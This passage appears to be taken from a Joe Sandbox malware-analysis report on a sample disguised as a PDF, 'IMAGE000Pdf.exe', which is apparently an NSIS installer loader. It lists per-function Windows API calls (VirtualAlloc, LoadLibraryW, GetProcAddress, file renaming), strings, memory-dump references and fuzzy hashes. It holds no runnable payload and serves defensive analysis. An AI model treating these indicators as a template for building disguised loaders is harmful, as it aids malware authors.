                                      • Associated: 00000000.00000002.1803208835.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803530559.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803530559.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID:
                                      • API String ID: 3850602802-0
                                      • Opcode ID: 33429e90f145919918c0f5a16300b6ae2cb664e9c61a266d81822a9c1fb78e21
                                      • Instruction ID: 9ccc480ae856a8f761d654a46a9a0801f91457f8e33b58f107ae6609e89c6df3
                                      • Opcode Fuzzy Hash: 33429e90f145919918c0f5a16300b6ae2cb664e9c61a266d81822a9c1fb78e21
                                      • Instruction Fuzzy Hash: 51B09235181A00AADE914B00DE09F457A62A7A4701F00C029B241240B4CAB200A4DB0A
                                      APIs
                                      • KiUserCallbackDispatcher.NTDLL(?,0040413D), ref: 00404370
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1803163466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1803147864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803184970.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803530559.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803530559.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: CallbackDispatcherUser
                                      • String ID:
                                      • API String ID: 2492992576-0
                                      • Opcode ID: fb2bbd85db119072699d8509dbb0c67ddc0fed6d182cd9e62e167e16add427de
                                      • Instruction ID: f32ebe17383345fd09930a0b12515434b8b37a693fa3d318b2a69664ac7713bd
                                      • Opcode Fuzzy Hash: fb2bbd85db119072699d8509dbb0c67ddc0fed6d182cd9e62e167e16add427de
                                      • Instruction Fuzzy Hash: 97A00176405540AFEE029B61EF09D4ABB72ABA9701B4185B9A286A0034CB364860EB1D
                                      APIs
                                      • VirtualAlloc.KERNELBASE(00000000), ref: 70022BB7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1837307793.0000000070021000.00000020.00000001.01000000.00000006.sdmp, Offset: 70020000, based on PE: true
                                      • Associated: 00000000.00000002.1837286771.0000000070020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000000.00000002.1837323978.0000000070024000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000000.00000002.1837342133.0000000070026000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_70020000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: 3a3f7bf9a2a4c4722f3bcbf2e2f630c3adecdb7f388efc6e713eac0a11dded40
                                      • Instruction ID: 02f150e1a575d9db8b81cb7095f3e7e388d12d5aab9d51d67d3857643ad5e0c8
                                      • Opcode Fuzzy Hash: 3a3f7bf9a2a4c4722f3bcbf2e2f630c3adecdb7f388efc6e713eac0a11dded40
                                      • Instruction Fuzzy Hash: 75416D72800204FFEB219FF5EDC6B5D77B9FB44B32F708465E50586522D734A8428B9A
                                      APIs
                                      • GlobalAlloc.KERNELBASE(00000040,?,7002123B,?,700212DF,00000019,700211BE,-000000A0), ref: 70021225
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1837307793.0000000070021000.00000020.00000001.01000000.00000006.sdmp, Offset: 70020000, based on PE: true
                                      • Associated: 00000000.00000002.1837286771.0000000070020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000000.00000002.1837323978.0000000070024000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000000.00000002.1837342133.0000000070026000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_70020000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: AllocGlobal
                                      • String ID:
                                      • API String ID: 3761449716-0
                                      • Opcode ID: 14f484b0151054ed7fae303f75d79d2c5eb23ca98eaa5194539bdee5e8b698ba
                                      • Instruction ID: afa57fa94c844b249ad2b2fd52f6b6381ed0b7cce35226c276b379cc95b957c7
                                      • Opcode Fuzzy Hash: 14f484b0151054ed7fae303f75d79d2c5eb23ca98eaa5194539bdee5e8b698ba
                                      • Instruction Fuzzy Hash: E4B01272A00000DFFE00CB65CC8AF343258E700312F344000FB00C0192C1B048118538
                                      APIs
                                        • Part of subcall function 7002121B: GlobalAlloc.KERNELBASE(00000040,?,7002123B,?,700212DF,00000019,700211BE,-000000A0), ref: 70021225
                                      • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 70021C8D
                                      • lstrcpyW.KERNEL32(00000008,?), ref: 70021CD5
                                      • lstrcpyW.KERNEL32(00000808,?), ref: 70021CDF
                                      • GlobalFree.KERNEL32(00000000), ref: 70021CF2
                                      • GlobalFree.KERNEL32(?), ref: 70021DD4
                                      • GlobalFree.KERNEL32(?), ref: 70021DD9
                                      • GlobalFree.KERNEL32(?), ref: 70021DDE
                                      • GlobalFree.KERNEL32(00000000), ref: 70021FC8
                                      • lstrcpyW.KERNEL32(?,?), ref: 70022182
                                      • GetModuleHandleW.KERNEL32(00000008), ref: 70022201
                                      • LoadLibraryW.KERNEL32(00000008), ref: 70022212
                                      • GetProcAddress.KERNEL32(?,?), ref: 7002226C
                                      • lstrlenW.KERNEL32(00000808), ref: 70022286
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1837307793.0000000070021000.00000020.00000001.01000000.00000006.sdmp, Offset: 70020000, based on PE: true
                                      • Associated: 00000000.00000002.1837286771.0000000070020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000000.00000002.1837323978.0000000070024000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000000.00000002.1837342133.0000000070026000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_70020000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                      • String ID:
                                      • API String ID: 245916457-0
                                      • Opcode ID: 0da3bb0a3a0ed21cc2954f0ed6826c1fa04ab9b2d6ffd46a331b9a382b7a6c9c
                                      • Instruction ID: 134c7867384aea5f5625d46a98dc65970c7a034015fdfbbdd5611b4c3fc8062b
                                      • Opcode Fuzzy Hash: 0da3bb0a3a0ed21cc2954f0ed6826c1fa04ab9b2d6ffd46a331b9a382b7a6c9c
                                      • Instruction Fuzzy Hash: 9022AD71C04205EECB21CFB4ED806EEB7FAFB24B26F20452ED566E6290D7705A81DB50
                                      APIs
                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004061D5,00000000,00000000), ref: 00406075
                                      • GetShortPathNameW.KERNEL32(?,007A55E8,00000400), ref: 0040607E
                                        • Part of subcall function 00405E49: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040612E,00000000,[Rename],00000000,00000000,00000000), ref: 00405E59
                                        • Part of subcall function 00405E49: lstrlenA.KERNEL32(00000000,?,00000000,0040612E,00000000,[Rename],00000000,00000000,00000000), ref: 00405E8B
                                      • GetShortPathNameW.KERNEL32(?,007A5DE8,00000400), ref: 0040609B
                                      • wsprintfA.USER32 ref: 004060B9
                                      • GetFileSize.KERNEL32(00000000,00000000,007A5DE8,C0000000,00000004,007A5DE8,?), ref: 004060F4
                                      • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406103
                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 0040613B
                                      • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,007A51E8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 00406191
                                      • GlobalFree.KERNEL32(00000000), ref: 004061A2
                                      • CloseHandle.KERNEL32(00000000), ref: 004061A9
                                        • Part of subcall function 00405EE4: GetFileAttributesW.KERNELBASE(?,00403055,C:\Users\user\Desktop\IMAGE000Pdf.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405EE8
                                        • Part of subcall function 00405EE4: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000007,00000009,0000000B), ref: 00405F0A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1803163466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1803147864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803184970.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803530559.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803530559.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                      • String ID: %ls=%ls$[Rename]$Uz$]z
                                      • API String ID: 2171350718-2939442745
                                      • Opcode ID: 0ed23fd09f20e9f0b0e4ce5e0ebdd9c0c92abb0a06c9999cd82c312b58dee0fa
                                      • Instruction ID: 03fe7b931bffc2b02635af9c10f4e714808f3729e90155368a1b4a6ed52067ca
                                      • Opcode Fuzzy Hash: 0ed23fd09f20e9f0b0e4ce5e0ebdd9c0c92abb0a06c9999cd82c312b58dee0fa
                                      • Instruction Fuzzy Hash: 44312370600B05BFD6206B618D48F6B3A6CDF86744F15013AFD42FA2C3DA3C99218ABD
                                      APIs
                                      • CharNextW.USER32(?,*?|<>/":,00000000,00000000,76F93420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\IMAGE000Pdf.exe",0040347D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00406700
                                      • CharNextW.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 0040670F
                                      • CharNextW.USER32(?,00000000,76F93420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\IMAGE000Pdf.exe",0040347D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00406714
                                      • CharPrevW.USER32(?,?,76F93420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\IMAGE000Pdf.exe",0040347D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00406727
                                      Strings
                                      • "C:\Users\user\Desktop\IMAGE000Pdf.exe", xrefs: 0040669D
                                      • *?|<>/":, xrefs: 004066EF
                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 0040669E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1803163466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1803147864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803184970.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803530559.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803530559.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: Char$Next$Prev
                                      • String ID: "C:\Users\user\Desktop\IMAGE000Pdf.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                      • API String ID: 589700163-2905521784
                                      • Opcode ID: 9ddbb9e18cbe24282ce487244f484090ca5dfb24375496ba9be4fccf49263134
                                      • Instruction ID: 12c80e2bf748d1a62cb3884e1ae38c2d534281e125f75e63bd15dfe73c9398b2
                                      • Opcode Fuzzy Hash: 9ddbb9e18cbe24282ce487244f484090ca5dfb24375496ba9be4fccf49263134
                                      • Instruction Fuzzy Hash: E711EB15800A1255DB303B148C84A7763F8EF947A4F56443FED86732C0E77D4C9286BD
                                      APIs
                                      • GetWindowLongW.USER32(?,000000EB), ref: 004043C8
                                      • GetSysColor.USER32(00000000), ref: 00404406
                                      • SetTextColor.GDI32(?,00000000), ref: 00404412
                                      • SetBkMode.GDI32(?,?), ref: 0040441E
                                      • GetSysColor.USER32(?), ref: 00404431
                                      • SetBkColor.GDI32(?,?), ref: 00404441
                                      • DeleteObject.GDI32(?), ref: 0040445B
                                      • CreateBrushIndirect.GDI32(?), ref: 00404465
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1803163466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1803147864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803184970.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803530559.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803530559.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                      • String ID:
                                      • API String ID: 2320649405-0
                                      • Opcode ID: 288dbcc7c85f11a55b3e08142a2a7aff64d3670202badf385cb57de10b60d8c1
                                      • Instruction ID: 7fe0b9bd09f79c55d2aa0e3576d5328f94b18663b05207f77db8afc097fd36db
                                      • Opcode Fuzzy Hash: 288dbcc7c85f11a55b3e08142a2a7aff64d3670202badf385cb57de10b60d8c1
                                      • Instruction Fuzzy Hash: F62174B15007049BCB319F78D948F5BBBF8AF80714B048A3EE9D2A26E1C734E905CB58
                                      APIs
                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402F49
                                      • MulDiv.KERNEL32(000DED8A,00000064,000DF8B0), ref: 00402F74
                                      • wsprintfW.USER32 ref: 00402F84
                                      • SetWindowTextW.USER32(?,?), ref: 00402F94
                                      • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402FA6
                                      Strings
                                      • verifying installer: %d%%, xrefs: 00402F7E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1803163466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1803147864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803184970.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803530559.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803530559.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: Text$ItemTimerWindowwsprintf
                                      • String ID: verifying installer: %d%%
                                      • API String ID: 1451636040-82062127
                                      • Opcode ID: e04d04eb7b63203ce5fd1c353c1d281d58231c4b0d3ff082bc1608e2171a15b6
                                      • Instruction ID: 448c993359d53400b231c8c55bc41b2c2aaf26e1e6946bd82a433317a94b79bc
                                      • Opcode Fuzzy Hash: e04d04eb7b63203ce5fd1c353c1d281d58231c4b0d3ff082bc1608e2171a15b6
                                      • Instruction Fuzzy Hash: 1101FF70640209BBEF209F60DE4AFAA3B79EB04349F008039FA16A51D1DBB999559F58
                                      APIs
                                        • Part of subcall function 7002121B: GlobalAlloc.KERNELBASE(00000040,?,7002123B,?,700212DF,00000019,700211BE,-000000A0), ref: 70021225
                                      • GlobalFree.KERNEL32(?), ref: 700226A3
                                      • GlobalFree.KERNEL32(00000000), ref: 700226D8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1837307793.0000000070021000.00000020.00000001.01000000.00000006.sdmp, Offset: 70020000, based on PE: true
                                      • Associated: 00000000.00000002.1837286771.0000000070020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000000.00000002.1837323978.0000000070024000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000000.00000002.1837342133.0000000070026000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_70020000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: Global$Free$Alloc
                                      • String ID:
                                      • API String ID: 1780285237-0
                                      • Opcode ID: 6c9c87b3c06f24079eba331cf0166deefa95cdb6a96fb0854ae30d6ae4b059f1
                                      • Instruction ID: 62d2ca7405cbe232492e33bc1598159ff0023cdb06abd0cbfffe8e7c2454bfb3
                                      • Opcode Fuzzy Hash: 6c9c87b3c06f24079eba331cf0166deefa95cdb6a96fb0854ae30d6ae4b059f1
                                      • Instruction Fuzzy Hash: 1131B033504101FFE7268FB5ECC8E2E77BAEB85B323304129F24187261C771A85A9B65
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1837307793.0000000070021000.00000020.00000001.01000000.00000006.sdmp, Offset: 70020000, based on PE: true
                                      • Associated: 00000000.00000002.1837286771.0000000070020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000000.00000002.1837323978.0000000070024000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000000.00000002.1837342133.0000000070026000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_70020000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: FreeGlobal
                                      • String ID:
                                      • API String ID: 2979337801-0
                                      • Opcode ID: 8145d3760f45d5524db2a9fc99e78319169c33239c54096091ad550c152ac532
                                      • Instruction ID: 03e14d8aeb671c75ca4859a9c70f09ba03e99769548cc3f6e13e244184c28e9d
                                      • Opcode Fuzzy Hash: 8145d3760f45d5524db2a9fc99e78319169c33239c54096091ad550c152ac532
                                      • Instruction Fuzzy Hash: 2F51E732D05055AECB129FA4FD805EEB6FBEB74B37B114269E406A3344D770AF818792
                                      APIs
                                      • GlobalFree.KERNEL32(00000000), ref: 70022522
                                        • Part of subcall function 7002122C: lstrcpynW.KERNEL32(00000000,?,700212DF,00000019,700211BE,-000000A0), ref: 7002123C
                                      • GlobalAlloc.KERNEL32(00000040), ref: 700224A8
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 700224C3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1837307793.0000000070021000.00000020.00000001.01000000.00000006.sdmp, Offset: 70020000, based on PE: true
                                      • Associated: 00000000.00000002.1837286771.0000000070020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000000.00000002.1837323978.0000000070024000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000000.00000002.1837342133.0000000070026000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_70020000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                      • String ID:
                                      • API String ID: 4216380887-0
                                      • Opcode ID: 3b7ddc189f5f0448ce2b89f1c33ddf52e57ee30c1b20a242d32d182ea441c848
                                      • Instruction ID: 3bf261c4995354775b73df8b9b072237dc25bade03bd30960d4f44fe96823947
                                      • Opcode Fuzzy Hash: 3b7ddc189f5f0448ce2b89f1c33ddf52e57ee30c1b20a242d32d182ea441c848
                                      • Instruction Fuzzy Hash: 5341CF71008305EFD325EFB0EC80A6E77F9FB58B32B20891DF94686292D770A545CB61
                                      APIs
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,70022238,?,00000808), ref: 70021635
                                      • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,70022238,?,00000808), ref: 7002163C
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,70022238,?,00000808), ref: 70021650
                                      • GetProcAddress.KERNEL32(70022238,00000000), ref: 70021657
                                      • GlobalFree.KERNEL32(00000000), ref: 70021660
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1837307793.0000000070021000.00000020.00000001.01000000.00000006.sdmp, Offset: 70020000, based on PE: true
                                      • Associated: 00000000.00000002.1837286771.0000000070020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000000.00000002.1837323978.0000000070024000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000000.00000002.1837342133.0000000070026000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_70020000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                      • String ID:
                                      • API String ID: 1148316912-0
                                      • Opcode ID: 3ef2a5638150cbd685245fbc0c647418c705a61f6b2fcb344889263d4c0d533b
                                      • Instruction ID: f486ee177f214617098f195c13f0f031be337e1f939b6ff5e02a3741c7159173
                                      • Opcode Fuzzy Hash: 3ef2a5638150cbd685245fbc0c647418c705a61f6b2fcb344889263d4c0d533b
                                      • Instruction Fuzzy Hash: A3F098732061387FA62116A78C8CE9BBE9CDF8B2F5B210215F728921A186A15D4297F5
                                      APIs
                                      • CharNextW.USER32(?,?,C:\,?,00405DE2,C:\,C:\,?,?,C:\Users\user\AppData\Local\Temp\,00405B20,?,76F93420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405D7C
                                      • CharNextW.USER32(00000000), ref: 00405D81
                                      • CharNextW.USER32(00000000), ref: 00405D99
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1803163466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1803147864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803184970.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
